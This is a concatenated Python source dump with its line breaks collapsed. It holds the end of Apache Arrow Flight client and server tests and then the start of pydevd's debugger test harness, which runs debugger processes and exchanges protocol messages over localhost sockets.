flight.FlightDescriptor.deserialize(desc.serialize()) desc = flight.FlightDescriptor.for_path("a", "b", "test.arrow") assert desc == flight.FlightDescriptor.deserialize(desc.serialize()) info = flight.FlightInfo( pa.schema([('a', pa.int32())]), desc, [ flight.FlightEndpoint(b'', ['grpc://test']), flight.FlightEndpoint( b'', [flight.Location.for_grpc_tcp('localhost', 5005)], ), ], -1, -1, ) info2 = flight.FlightInfo.deserialize(info.serialize()) assert info.schema == info2.schema assert info.descriptor == info2.descriptor assert info.total_bytes == info2.total_bytes assert info.total_records == info2.total_records assert info.endpoints == info2.endpoints def test_roundtrip_errors(): """Ensure that Flight errors propagate from server to client.""" with flight_server(ErrorFlightServer) as server_location: client = flight.FlightClient.connect(server_location) with pytest.raises(flight.FlightInternalError, match=".*foo.*"): list(client.do_action(flight.Action("internal", b""))) with pytest.raises(flight.FlightTimedOutError, match=".*foo.*"): list(client.do_action(flight.Action("timedout", b""))) with pytest.raises(flight.FlightCancelledError, match=".*foo.*"): list(client.do_action(flight.Action("cancel", b""))) with pytest.raises(flight.FlightUnauthenticatedError, match=".*foo.*"): list(client.do_action(flight.Action("unauthenticated", b""))) with pytest.raises(flight.FlightUnauthorizedError, match=".*foo.*"): list(client.do_action(flight.Action("unauthorized", b""))) with pytest.raises(flight.FlightInternalError, match=".*foo.*"): list(client.list_flights()) def test_do_put_independent_read_write(): """Ensure that separate threads can read/write on a DoPut.""" # ARROW-6063: previously this would cause gRPC to abort when the # writer was closed (due to simultaneous reads), or would hang # forever. data = [ pa.array([-10, -5, 0, 5, 10]) ] table = pa.Table.from_arrays(data, names=['a']) with flight_server(MetadataFlightServer) as server_location: client = flight.FlightClient.connect(server_location) writer, metadata_reader = client.do_put( flight.FlightDescriptor.for_path(''), table.schema) count = [0] def _reader_thread(): while metadata_reader.read() is not None: count[0] += 1 thread = threading.Thread(target=_reader_thread) thread.start() batches = table.to_batches(max_chunksize=1) with writer: for idx, batch in enumerate(batches): metadata = struct.pack('<i', idx) writer.write_with_metadata(batch, metadata) # Causes the server to stop writing and end the call writer.done_writing() # Thus reader thread will break out of loop thread.join() # writer.close() won't segfault since reader thread has # stopped assert count[0] == len(batches)
debugger_unittest.py
from collections import namedtuple from contextlib import contextmanager import json try: from urllib import quote, quote_plus, unquote_plus except ImportError: from urllib.parse import quote, quote_plus, unquote_plus # @UnresolvedImport import re import socket import subprocess import threading import time import traceback from tests_python.debug_constants import * from _pydev_bundle import pydev_localhost, pydev_log # Note: copied (don't import because we want it to be independent on the actual code because of backward compatibility). CMD_RUN = 101 CMD_LIST_THREADS = 102 CMD_THREAD_CREATE = 103 CMD_THREAD_KILL = 104 CMD_THREAD_SUSPEND = 105 CMD_THREAD_RUN = 106 CMD_STEP_INTO = 107 CMD_STEP_OVER = 108 CMD_STEP_RETURN = 109 CMD_GET_VARIABLE = 110 CMD_SET_BREAK = 111 CMD_REMOVE_BREAK = 112 CMD_EVALUATE_EXPRESSION = 113 CMD_GET_FRAME = 114 CMD_EXEC_EXPRESSION = 115 CMD_WRITE_TO_CONSOLE = 116 CMD_CHANGE_VARIABLE = 117 CMD_RUN_TO_LINE = 118 CMD_RELOAD_CODE = 119 CMD_GET_COMPLETIONS = 120 # Note: renumbered (conflicted on merge) CMD_CONSOLE_EXEC = 121 CMD_ADD_EXCEPTION_BREAK = 122 CMD_REMOVE_EXCEPTION_BREAK = 123 CMD_LOAD_SOURCE = 124 CMD_ADD_DJANGO_EXCEPTION_BREAK = 125 CMD_REMOVE_DJANGO_EXCEPTION_BREAK = 126 CMD_SET_NEXT_STATEMENT = 127 CMD_SMART_STEP_INTO = 128 CMD_EXIT = 129 CMD_SIGNATURE_CALL_TRACE = 130 CMD_SET_PY_EXCEPTION = 131 CMD_GET_FILE_CONTENTS = 132 CMD_SET_PROPERTY_TRACE = 133 # Pydev debug console commands CMD_EVALUATE_CONSOLE_EXPRESSION = 134 CMD_RUN_CUSTOM_OPERATION = 135 CMD_GET_BREAKPOINT_EXCEPTION = 136 CMD_STEP_CAUGHT_EXCEPTION = 137 CMD_SEND_CURR_EXCEPTION_TRACE = 138 CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED = 139 CMD_IGNORE_THROWN_EXCEPTION_AT = 140 CMD_ENABLE_DONT_TRACE = 141 CMD_SHOW_CONSOLE = 142 CMD_GET_ARRAY = 143 CMD_STEP_INTO_MY_CODE = 144 CMD_GET_CONCURRENCY_EVENT = 145 CMD_SHOW_RETURN_VALUES = 146 CMD_GET_THREAD_STACK = 152 CMD_THREAD_DUMP_TO_STDERR = 153 # This is mostly for unit-tests to diagnose errors on ci. CMD_STOP_ON_START = 154 CMD_GET_EXCEPTION_DETAILS = 155 CMD_PYDEVD_JSON_CONFIG = 156 CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION = 157 CMD_THREAD_RESUME_SINGLE_NOTIFICATION = 158 CMD_STEP_OVER_MY_CODE = 159 CMD_STEP_RETURN_MY_CODE = 160 CMD_SET_PY_EXCEPTION = 161 CMD_REDIRECT_OUTPUT = 200 CMD_GET_NEXT_STATEMENT_TARGETS = 201 CMD_SET_PROJECT_ROOTS = 202 CMD_AUTHENTICATE = 205 CMD_VERSION = 501 CMD_RETURN = 502 CMD_SET_PROTOCOL = 503 CMD_ERROR = 901 REASON_CAUGHT_EXCEPTION = CMD_STEP_CAUGHT_EXCEPTION REASON_UNCAUGHT_EXCEPTION = CMD_ADD_EXCEPTION_BREAK REASON_STOP_ON_BREAKPOINT = CMD_SET_BREAK REASON_THREAD_SUSPEND = CMD_THREAD_SUSPEND REASON_STEP_INTO = CMD_STEP_INTO REASON_STEP_INTO_MY_CODE = CMD_STEP_INTO_MY_CODE REASON_STOP_ON_START = CMD_STOP_ON_START REASON_STEP_RETURN = CMD_STEP_RETURN REASON_STEP_RETURN_MY_CODE = CMD_STEP_RETURN_MY_CODE REASON_STEP_OVER = CMD_STEP_OVER REASON_STEP_OVER_MY_CODE = CMD_STEP_OVER_MY_CODE # Always True (because otherwise when we do have an error, it's hard to diagnose). SHOW_WRITES_AND_READS = True SHOW_OTHER_DEBUG_INFO = True SHOW_STDOUT = True import platform IS_CPYTHON = platform.python_implementation() == 'CPython' IS_IRONPYTHON = platform.python_implementation() == 'IronPython' IS_JYTHON = platform.python_implementation() == 'Jython' IS_PYPY = platform.python_implementation() == 'PyPy' IS_APPVEYOR = os.environ.get('APPVEYOR', '') in ('True', 'true', '1') try: from thread import start_new_thread except ImportError: from _thread import start_new_thread # @UnresolvedImport try: xrange except: xrange = range Hit = namedtuple('Hit', 'thread_id, frame_id, line, suspend_type, name, file') def overrides(method): ''' Helper to check that one method overrides another (redeclared in unit-tests to avoid importing pydevd). ''' def wrapper(func): if func.__name__ != method.__name__: msg = "Wrong @override: %r expected, but overwriting %r." msg = msg % (func.__name__, method.__name__) raise AssertionError(msg) if func.__doc__ is None: func.__doc__ = method.__doc__ return func return wrapper TIMEOUT = 20 try: TimeoutError = TimeoutError # @ReservedAssignment except NameError: class TimeoutError(RuntimeError): # @ReservedAssignment pass def wait_for_condition(condition, msg=None, timeout=TIMEOUT, sleep=.05): curtime = time.time() while True: if condition(): break if time.time() - curtime > timeout: error_msg = 'Condition not reached in %s seconds' % (timeout,) if msg is not None: error_msg += '\n' if callable(msg): error_msg += msg() else: error_msg += str(msg) raise TimeoutError(error_msg) time.sleep(sleep) class IgnoreFailureError(RuntimeError): pass #======================================================================================================================= # ReaderThread #======================================================================================================================= class ReaderThread(threading.Thread): MESSAGES_TIMEOUT = 15 def __init__(self, sock): threading.Thread.__init__(self) self.name = 'Test Reader Thread' try: from queue import Queue except ImportError: from Queue import Queue self.setDaemon(True) self._buffer = b'' self.sock = sock self._queue = Queue() self._kill = False self.accept_xml_messages = True def set_messages_timeout(self, timeout): self.MESSAGES_TIMEOUT = timeout def get_next_message(self, context_message, timeout=None): if timeout is None: timeout = self.MESSAGES_TIMEOUT try: msg = self._queue.get(block=True, timeout=timeout) except: raise TimeoutError('No message was written in %s seconds. Error message:\n%s' % (timeout, context_message,)) else: frame = sys._getframe().f_back.f_back frame_info = '' while frame: if not frame.f_code.co_name.startswith('test_'): frame = frame.f_back continue if frame.f_code.co_filename.endswith('debugger_unittest.py'): frame = frame.f_back continue stack_msg = ' -- File "%s", line %s, in %s\n' % (frame.f_code.co_filename, frame.f_lineno, frame.f_code.co_name) if 'run' == frame.f_code.co_name: frame_info = stack_msg # Ok, found the writer thread 'run' method (show only that). break frame_info += stack_msg frame = frame.f_back # Just print the first which is not debugger_unittest.py break frame = None sys.stdout.write('Message returned in get_next_message(): %s -- ctx: %s, asked at:\n%s\n' % (unquote_plus(unquote_plus(msg)), context_message, frame_info)) if not self.accept_xml_messages: if '<xml' in msg: raise AssertionError('Xml messages disabled. Received: %s' % (msg,)) return msg def _read(self, size): while True: buffer_len = len(self._buffer) if buffer_len == size: ret = self._buffer self._buffer = b'' return ret if buffer_len > size: ret = self._buffer[:size] self._buffer = self._buffer[size:] return ret r = self.sock.recv(max(size - buffer_len, 1024)) if not r: return b'' self._buffer += r def _read_line(self): while True: i = self._buffer.find(b'\n') if i != -1: i += 1 # Add the newline to the return ret = self._buffer[:i] self._buffer = self._buffer[i:] return ret else: r = self.sock.recv(1024) if not r: return b'' self._buffer += r def run(self): try: content_len = -1 while not self._kill: line = self._read_line() if not line: break if SHOW_WRITES_AND_READS: show_line = line if IS_PY3K: show_line = line.decode('utf-8') print('%s Received %s' % (self.name, show_line,)) if line.startswith(b'Content-Length:'): content_len = int(line.strip().split(b':', 1)[1]) continue if content_len != -1: # If we previously received a content length, read until a '\r\n'. if line == b'\r\n': json_contents = self._read(content_len) content_len = -1 if len(json_contents) == 0: self.handle_except() return # Finished communication. msg = json_contents if IS_PY3K: msg = msg.decode('utf-8') print('Test Reader Thread Received %s' % (msg,)) self._queue.put(msg) continue else: # No content len, regular line-based protocol message (remove trailing new-line). if line.endswith(b'\n\n'): line = line[:-2] elif line.endswith(b'\n'): line = line[:-1] elif line.endswith(b'\r'): line = line[:-1] msg = line if IS_PY3K: msg = msg.decode('utf-8') print('Test Reader Thread Received %s' % (msg,)) self._queue.put(msg) except: pass # ok, finished it finally: # When the socket from pydevd is closed the client should shutdown to notify # it acknowledged it. try: self.sock.shutdown(socket.SHUT_RDWR) except: pass try: self.sock.close() except: pass def do_kill(self): self._kill = True if hasattr(self, 'sock'): from socket import SHUT_RDWR try: self.sock.shutdown(SHUT_RDWR) except: pass try: self.sock.close() except: pass delattr(self, 'sock') def read_process(stream, buffer, debug_stream, stream_name, finish): while True: line = stream.readline() if not line: break if IS_PY3K: line = line.decode('utf-8', errors='replace') if SHOW_STDOUT: debug_stream.write('%s: %s' % (stream_name, line,)) buffer.append(line) if finish[0]: return def start_in_daemon_thread(target, args): t0 = threading.Thread(target=target, args=args) t0.setDaemon(True) t0.start() class DebuggerRunner(object): def __init__(self, tmpdir): if tmpdir is not None: self.pydevd_debug_file = os.path.join(str(tmpdir), 'pydevd_debug_file_%s.txt' % (os.getpid(),)) else: self.pydevd_debug_file = None def get_command_line(self): ''' Returns the base command line (i.e.: ['python.exe', '-u']) ''' raise NotImplementedError def add_command_line_args(self, args): writer = self.writer port = int(writer.port) localhost = pydev_localhost.get_localhost() ret = [ writer.get_pydevd_file(), '--DEBUG_RECORD_SOCKET_READS', ] if not IS_PY36_OR_GREATER or not IS_CPYTHON or not TEST_CYTHON: # i.e.: in frame-eval mode we support native threads, whereas # on other cases we need the qt monkeypatch. ret += ['--qt-support'] ret += [ '--client', localhost, '--port', str(port), ] if writer.IS_MODULE: ret += ['--module'] ret += ['--file'] + writer.get_command_line_args() ret = writer.update_command_line_args(ret) # Provide a hook for the writer return args + ret @contextmanager def check_case(self, writer_class, wait_for_port=True): try: if callable(writer_class): writer = writer_class() else: writer = writer_class try: writer.start() if wait_for_port: wait_for_condition(lambda: hasattr(writer, 'port')) self.writer = writer args = self.get_command_line() args = self.add_command_line_args(args) if SHOW_OTHER_DEBUG_INFO: print('executing: %s' % (' '.join(args),)) with self.run_process(args, writer) as dct_with_stdout_stder: try: if wait_for_port: wait_for_condition(lambda: writer.finished_initialization) except TimeoutError: sys.stderr.write('Timed out waiting for initialization\n') sys.stderr.write('stdout:\n%s\n\nstderr:\n%s\n' % ( ''.join(dct_with_stdout_stder['stdout']), ''.join(dct_with_stdout_stder['stderr']), )) raise finally: writer.get_stdout = lambda: ''.join(dct_with_stdout_stder['stdout']) writer.get_stderr = lambda: ''.join(dct_with_stdout_stder['stderr']) yield writer finally: writer.do_kill() writer.log = [] stdout = dct_with_stdout_stder['stdout'] stderr = dct_with_stdout_stder['stderr'] writer.additional_output_checks(''.join(stdout), ''.join(stderr)) except IgnoreFailureError: sys.stderr.write('Test finished with ignored failure.\n') return def create_process(self, args, writer): env = writer.get_environ() if writer is not None else None if env is None: env = os.environ.copy() if self.pydevd_debug_file: env['PYDEVD_DEBUG'] = 'True' env['PYDEVD_DEBUG_FILE'] = self.pydevd_debug_file print('Logging to: %s' % (self.pydevd_debug_file,)) process = subprocess.Popen( args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, cwd=writer.get_cwd() if writer is not None else '.', env=env, ) return process @contextmanager def run_process(self, args, writer): process = self.create_process(args, writer) writer.process = process stdout = [] stderr = [] finish = [False] dct_with_stdout_stder = {} fail_with_message = False try: start_in_daemon_thread(read_process, (process.stdout, stdout, sys.stdout, 'stdout', finish)) start_in_daemon_thread(read_process, (process.stderr, stderr, sys.stderr, 'stderr', finish)) if SHOW_OTHER_DEBUG_INFO: print('Both processes started') # polls can fail (because the process may finish and the thread still not -- so, we give it some more chances to # finish successfully). initial_time = time.time() shown_intermediate = False dumped_threads = False dct_with_stdout_stder['stdout'] = stdout dct_with_stdout_stder['stderr'] = stderr try: yield dct_with_stdout_stder except: fail_with_message = True # Let's print the actuayl exception here (it doesn't appear properly on Python 2 and # on Python 3 it's hard to find because pytest output is too verbose). sys.stderr.write('***********\n') sys.stderr.write('***********\n') sys.stderr.write('***********\n') traceback.print_exc() sys.stderr.write('***********\n') sys.stderr.write('***********\n') sys.stderr.write('***********\n') raise if not writer.finished_ok: self.fail_with_message( "The thread that was doing the tests didn't finish successfully (writer.finished_ok = True not set).", stdout, stderr, writer ) while True: if process.poll() is not None: if writer.EXPECTED_RETURNCODE != 'any': expected_returncode = writer.EXPECTED_RETURNCODE if not isinstance(expected_returncode, (list, tuple)): expected_returncode = (expected_returncode,) if process.returncode not in expected_returncode: self.fail_with_message('Expected process.returncode to be %s. Found: %s' % ( writer.EXPECTED_RETURNCODE, process.returncode), stdout, stderr, writer) break else: if writer is not None: if writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK: process.kill() continue if not shown_intermediate and (time.time() - initial_time > (TIMEOUT / 3.)): # 1/3 of timeout print('Warning: writer thread exited and process still did not (%.2fs seconds elapsed).' % (time.time() - initial_time,)) shown_intermediate = True if time.time() - initial_time > ((TIMEOUT / 3.) * 2.): # 2/3 of timeout if not dumped_threads: dumped_threads = True # It still didn't finish. Ask for a thread dump # (we'll be able to see it later on the test output stderr). try: writer.write_dump_threads() except: traceback.print_exc() if time.time() - initial_time > TIMEOUT: # timed out process.kill() time.sleep(.2) self.fail_with_message( "The other process should've exited but still didn't (%.2fs seconds timeout for process to exit)." % (time.time() - initial_time,), stdout, stderr, writer ) time.sleep(.2) if writer is not None: if not writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK: if stdout is None: self.fail_with_message( "The other process may still be running -- and didn't give any output.", stdout, stderr, writer) check = 0 while not writer.check_test_suceeded_msg(stdout, stderr): check += 1 if check == 50: self.fail_with_message("TEST SUCEEDED not found.", stdout, stderr, writer) time.sleep(.1) except TimeoutError: msg = 'TimeoutError' try: writer.write_dump_threads() except: msg += ' (note: error trying to dump threads on timeout).' time.sleep(.2) self.fail_with_message(msg, stdout, stderr, writer) except Exception as e: if fail_with_message: self.fail_with_message(str(e), stdout, stderr, writer) else: raise finally: try: if process.poll() is None: process.kill() except: traceback.print_exc() finish[0] = True def fail_with_message(self, msg, stdout, stderr, writerThread): log_contents = '' for f in pydev_log.list_log_files(self.pydevd_debug_file): if os.path.exists(f): with open(f, 'r') as stream: log_contents += '\n-------------------- %s ------------------\n\n' % (f,) log_contents += stream.read() msg += ("\n\n===========================\nStdout: \n" + ''.join(stdout) + "\n\n===========================\nStderr:" + ''.join(stderr) + "\n\n===========================\nWriter Log:\n" + '\n'.join(getattr(writerThread, 'log', [])) + "\n\n===========================\nLog:" + log_contents) if IS_JYTHON: # It seems we have some spurious errors which make Jython tests flaky (on a test run it's # not unusual for one test among all the tests to fail with this error on Jython). # The usual traceback in this case is: # # Traceback (most recent call last): # File "/home/travis/build/fabioz/PyDev.Debugger/_pydevd_bundle/pydevd_comm.py", line 287, in _on_run # line = self._read_line() # File "/home/travis/build/fabioz/PyDev.Debugger/_pydevd_bundle/pydevd_comm.py", line 270, in _read_line # r = self.sock.recv(1024) # File "/home/travis/build/fabioz/PyDev.Debugger/_pydevd_bundle/pydevd_comm.py", line 270, in _read_line # r = self.sock.recv(1024) # File "/home/travis/jython/Lib/_socket.py", line 1270, in recv # data, _ = self._get_message(bufsize, "recv") # File "/home/travis/jython/Lib/_socket.py", line 384, in handle_exception # raise _map_exception(jlx) # error: [Errno -1] Unmapped exception: java.lang.NullPointerException # # So, ignore errors in this situation. if 'error: [Errno -1] Unmapped exception: java.lang.NullPointerException' in msg: raise IgnoreFailureError() raise AssertionError(msg) #======================================================================================================================= # AbstractWriterThread #======================================================================================================================= class AbstractWriterThread(threading.Thread): FORCE_KILL_PROCESS_WHEN_FINISHED_OK = False IS_MODULE = False TEST_FILE = None EXPECTED_RETURNCODE = 0 def __init__(self, *args, **kwargs): threading.Thread.__init__(self, *args, **kwargs) self.process = None # Set after the process is created. self.setDaemon(True) self.finished_ok = False self.finished_initialization = False self._next_breakpoint_id = 0 self.log = [] def run(self): self.start_socket() def check_test_suceeded_msg(self, stdout, stderr): return 'TEST SUCEEDED' in ''.join(stdout) def update_command_line_args(self, args): return args def _ignore_stderr_line(self, line): if line.startswith(( 'debugger: ', '>>', '<<', 'warning: Debugger speedups', 'pydev debugger: New process is launching', 'pydev debugger: To debug that process', '*** Multiprocess', )): return True for expected in ( 'PyDev console: using IPython', 'Attempting to work in a virtualenv. If you encounter problems, please', ): if expected in line: return True if re.match(r'^(\d+)\t(\d)+', line): return True if IS_JYTHON: for expected in ( 'org.python.netty.util.concurrent.DefaultPromise', 'org.python.netty.util.concurrent.SingleThreadEventExecutor', 'Failed to submit a listener notification task. Event loop shut down?', 'java.util.concurrent.RejectedExecutionException', 'An event executor terminated with non-empty task', 'java.lang.UnsupportedOperationException', "RuntimeWarning: Parent module '_pydevd_bundle' not found while handling absolute import", 'from _pydevd_bundle.pydevd_additional_thread_info_regular import _current_frames', 'from _pydevd_bundle.pydevd_additional_thread_info import _current_frames', 'import org.python.core as PyCore #@UnresolvedImport', 'from _pydevd_bundle.pydevd_additional_thread_info import set_additional_thread_info', "RuntimeWarning: Parent module '_pydevd_bundle._debug_adapter' not found while handling absolute import", 'import json', # Issues with Jython and Java 9. 'WARNING: Illegal reflective access by org.python.core.PySystemState', 'WARNING: Please consider reporting this to the maintainers of org.python.core.PySystemState', 'WARNING: An illegal reflective access operation has occurred', 'WARNING: Illegal reflective access by jnr.posix.JavaLibCHelper', 'WARNING: Please consider reporting this to the maintainers of jnr.posix.JavaLibCHelper', 'WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations', 'WARNING: All illegal access operations will be denied in a future release', ): if expected in line: return True if line.strip().startswith('at '): return True if IS_PY26: # Sometimes in the ci there's an unhandled exception which doesn't have a stack trace # (apparently this happens when a daemon thread dies during process shutdown). # This was only reproducible on the ci on Python 2.6, so, ignoring that output on Python 2.6 only. for expected in ( 'Unhandled exception in thread started by <_pydev_bundle.pydev_monkey._NewThreadStartupWithTrace'): if expected in line: return True return False def additional_output_checks(self, stdout, stderr): lines_with_error = [] for line in stderr.splitlines(): line = line.strip() if not line: continue if not self._ignore_stderr_line(line): lines_with_error.append(line) if lines_with_error: raise AssertionError('Did not expect to have line(s) in stderr:\n\n%s\n\nFull stderr:\n\n%s' % ( '\n'.join(lines_with_error), stderr)) def get_environ(self): return None def get_pydevd_file(self): dirname = os.path.dirname(__file__) dirname = os.path.dirname(dirname) return os.path.abspath(os.path.join(dirname, 'pydevd.py')) def get_pydevconsole_file(self): dirname = os.path.dirname(__file__) dirname = os.path.dirname(dirname) return os.path.abspath(os.path.join(dirname, 'pydevconsole.py')) def get_line_index_with_content(self, line_content, filename=None): ''' :return the line index which has the given content (1-based). ''' if filename is None: filename = self.TEST_FILE with open(filename, 'r') as stream: for i_line, line in enumerate(stream): if line_content in line: return i_line + 1 raise AssertionError('Did not find: %s in %s' % (line_content, self.TEST_FILE)) def get_cwd(self): return os.path.dirname(self.get_pydevd_file()) def get_command_line_args(self): return [self.TEST_FILE] def do_kill(self): if hasattr(self, 'server_socket'): self.server_socket.close() delattr(self, 'server_socket') if hasattr(self, 'reader_thread'): # if it's not created, it's not there... self.reader_thread.do_kill() delattr(self, 'reader_thread') if hasattr(self, 'sock'): self.sock.close() delattr(self, 'sock') if hasattr(self, 'port'): delattr(self, 'port') def write_with_content_len(self, msg): self.log.append('write: %s' % (msg,)) if SHOW_WRITES_AND_READS: print('Test Writer Thread Written %s' % (msg,)) if not hasattr(self, 'sock'): print('%s.sock not available when sending: %s' % (self, msg)) return if not isinstance(msg, bytes): msg = msg.encode('utf-8') self.sock.sendall((u'Content-Length: %s\r\n\r\n' % len(msg)).encode('ascii')) self.sock.sendall(msg) _WRITE_LOG_PREFIX = 'write: ' def write(self, s): from _pydevd_bundle.pydevd_comm import ID_TO_MEANING meaning = ID_TO_MEANING.get(re.search(r'\d+', s).group(), '') if meaning: meaning += ': ' self.log.append(self._WRITE_LOG_PREFIX + '%s%s' % (meaning, s,)) if SHOW_WRITES_AND_READS: print('Test Writer Thread Written %s%s' % (meaning, s,)) msg = s + '\n' if not hasattr(self, 'sock'): print('%s.sock not available when sending: %s' % (self, msg)) return if IS_PY3K: msg = msg.encode('utf-8') self.sock.send(msg) def get_next_message(self, context_message, timeout=None): return self.reader_thread.get_next_message(context_message, timeout=timeout) def start_socket(self, port=None): assert not hasattr(self, 'port'), 'Socket already initialized.' from _pydev_bundle.pydev_localhost import get_socket_name if SHOW_WRITES_AND_READS: print('start_socket') self._sequence = -1 if port is None: socket_name = get_socket_name(close=True) else: socket_name = (pydev_localhost.get_localhost(), port) server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_socket.bind(socket_name) self.port = socket_name[1] server_socket.listen(1) if SHOW_WRITES_AND_READS: print('Waiting in socket.accept()') self.server_socket = server_socket new_socket, addr = server_socket.accept() if SHOW_WRITES_AND_READS: print('Test Writer Thread Socket:', new_socket, addr) self._set_socket(new_socket) def _set_socket(self, new_socket): curr_socket = getattr(self, 'sock', None) if curr_socket: try: curr_socket.shutdown(socket.SHUT_WR) except: pass try: curr_socket.close() except: pass reader_thread = self.reader_thread = ReaderThread(new_socket) self.sock = new_socket reader_thread.start() # initial command is always the version self.write_version() self.log.append('start_socket') self.finished_initialization = True def start_socket_client(self, host, port): self._sequence = -1 if SHOW_WRITES_AND_READS: print("Connecting to %s:%s" % (host, port)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set TCP keepalive on an open socket. # It activates after 1 second (TCP_KEEPIDLE,) of idleness, # then sends a keepalive ping once every 3 seconds (TCP_KEEPINTVL), # and closes the connection after 5 failed ping (TCP_KEEPCNT), or 15 seconds try: from socket import IPPROTO_TCP, SO_KEEPALIVE, TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT s.setsockopt(socket.SOL_SOCKET, SO_KEEPALIVE, 1) s.setsockopt(IPPROTO_TCP, TCP_KEEPIDLE, 1) s.setsockopt(IPPROTO_TCP, TCP_KEEPINTVL, 3) s.setsockopt(IPPROTO_TCP, TCP_KEEPCNT, 5) except ImportError: pass # May not be available everywhere. # 10 seconds default timeout timeout = int(os.environ.get('PYDEVD_CONNECT_TIMEOUT', 10)) s.settimeout(timeout) for _i in range(20): try: s.connect((host, port)) break except: time.sleep(.5) # We may have to wait a bit more and retry (especially on PyPy). s.settimeout(None) # no timeout after connected if SHOW_WRITES_AND_READS: print("Connected.") self._set_socket(s) return s def next_breakpoint_id(self): self._next_breakpoint_id += 1 return self._next_breakpoint_id def next_seq(self): self._sequence += 2 return self._sequence def wait_for_new_thread(self): # wait for hit breakpoint last = '' while not '<xml><thread name="' in last or '<xml><thread name="pydevd.' in last: last = self.get_next_message('wait_for_new_thread') # we have something like <xml><thread name="MainThread" id="12103472" /></xml> splitted = last.split('"') thread_id = splitted[3] return thread_id def wait_for_output(self): # Something as: # <xml><io s="TEST SUCEEDED%2521" ctx="1"/></xml> while True: msg = self.get_next_message('wait_output') if "<xml><io s=" in msg: if 'ctx="1"' in msg: ctx = 'stdout' elif 'ctx="2"' in msg: ctx = 'stderr' else: raise AssertionError('IO message without ctx.') msg = unquote_plus(unquote_plus(msg.split('"')[1])) return msg, ctx def get_current_stack_hit(self, thread_id, **kwargs): self.write_get_thread_stack(thread_id) msg = self.wait_for_message(CMD_GET_THREAD_STACK) return self._get_stack_as_hit(msg, **kwargs) def wait_for_single_notification_as_hit(self, reason=REASON_STOP_ON_BREAKPOINT, **kwargs): dct = self.wait_for_json_message(CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION) assert dct['stop_reason'] == reason line = kwargs.pop('line', None) file = kwargs.pop('file', None) assert not kwargs, 'Unexpected kwargs: %s' % (kwargs,) return self.get_current_stack_hit(dct['thread_id'], line=line, file=file) def wait_for_breakpoint_hit(self, reason=REASON_STOP_ON_BREAKPOINT, timeout=None, **kwargs): ''' 108 is over 109 is return 111 is breakpoint :param reason: may be the actual reason (int or string) or a list of reasons. ''' # note: those must be passed in kwargs. line = kwargs.get('line') file = kwargs.get('file') name = kwargs.get('name') self.log.append('Start: wait_for_breakpoint_hit') # wait for hit breakpoint if not isinstance(reason, (list, tuple)): reason = (reason,) def accept_message(last): for r in reason: if ('stop_reason="%s"' % (r,)) in last: return True return False msg = self.wait_for_message(accept_message, timeout=timeout) return self._get_stack_as_hit(msg, file, line, name) def _get_stack_as_hit(self, msg, file=None, line=None, name=None): # we have something like <xml><thread id="12152656" stop_reason="111"><frame id="12453120" name="encode" ... if len(msg.thread.frame) == 0: frame = msg.thread.frame else: frame = msg.thread.frame[0] thread_id = msg.thread['id'] frame_id = frame['id'] suspend_type = msg.thread['suspend_type'] hit_name = frame['name'] frame_line = int(frame['line']) frame_file = frame['file'] if file is not None: assert frame_file.endswith(file), 'Expected hit to be in file %s, was: %s' % (file, frame_file) if line is not None: assert line == frame_line, 'Expected hit to be in line %s, was: %s (in file: %s)' % (line, frame_line, frame_file) if name is not None: if not isinstance(name, (list, tuple, set)): assert name == hit_name else: assert hit_name in name self.log.append('End(1): wait_for_breakpoint_hit: %s' % (msg.original_xml,)) return Hit( thread_id=thread_id, frame_id=frame_id, line=frame_line, suspend_type=suspend_type, name=hit_name, file=frame_file) def wait_for_get_next_statement_targets(self): last = '' while not '<xml><line>' in last: last = self.get_next_message('wait_for_get_next_statement_targets') matches = re.finditer(r"(<line>([0-9]*)<\/line>)", last, re.IGNORECASE) lines = [] for _, match in enumerate(matches): try: lines.append(int(match.group(2))) except ValueError: pass return set(lines) def wait_for_custom_operation(self, expected): # wait for custom operation response, the response is double encoded expected_encoded = quote(quote_plus(expected)) last = '' while not expected_encoded in last: last = self.get_next_message('wait_for_custom_operation. Expected (encoded): %s' % (expected_encoded,)) return True def _is_var_in_last(self, expected, last): if expected in last: return True last = unquote_plus(last) if expected in last: return True # We actually quote 2 times on the backend... last = unquote_plus(last) if expected in last: return True return False def wait_for_multiple_vars(self, expected_vars): if not isinstance(expected_vars, (list, tuple)): expected_vars = [expected_vars] all_found = [] ignored = [] while True: try: last = self.get_next_message('wait_for_multiple_vars: %s' % (expected_vars,)) except: missing = [] for v in expected_vars: if v not in all_found: missing.append(v) raise ValueError('Not Found:\n%s\nNot found messages: %s\nFound messages: %s\nExpected messages: %s\nIgnored messages:\n%s' % ( '\n'.join(str(x) for x in missing), len(missing), len(all_found), len(expected_vars), '\n'.join(str(x) for x in ignored))) was_message_used = False new_expected = [] for expected in expected_vars: found_expected = False if isinstance(expected, (tuple, list)): for e in expected: if self._is_var_in_last(e, last): was_message_used = True found_expected = True all_found.append(expected) break else: if self._is_var_in_last(expected, last): was_message_used = True found_expected = True all_found.append(expected) if not found_expected: new_expected.append(expected) expected_vars = new_expected if not expected_vars: return True if not was_message_used: ignored.append(last) wait_for_var = wait_for_multiple_vars wait_for_vars = wait_for_multiple_vars wait_for_evaluation = wait_for_multiple_vars def write_make_initial_run(self): self.write("101\t%s\t" % self.next_seq()) self.log.append('write_make_initial_run') def write_set_protocol(self, protocol): self.write("%s\t%s\t%s" % (CMD_SET_PROTOCOL, self.next_seq(), protocol)) def write_authenticate(self, access_token, client_access_token): msg = "%s\t%s\t%s" % (CMD_AUTHENTICATE, self.next_seq(), access_token) self.write(msg) self.wait_for_message(lambda msg:client_access_token in msg, expect_xml=False) def write_version(self): from _pydevd_bundle.pydevd_constants import IS_WINDOWS self.write("%s\t%s\t1.0\t%s\tID" % (CMD_VERSION, self.next_seq(), 'WINDOWS' if IS_WINDOWS else 'UNIX')) def get_main_filename(self): return self.TEST_FILE def write_show_return_vars(self, show=1): 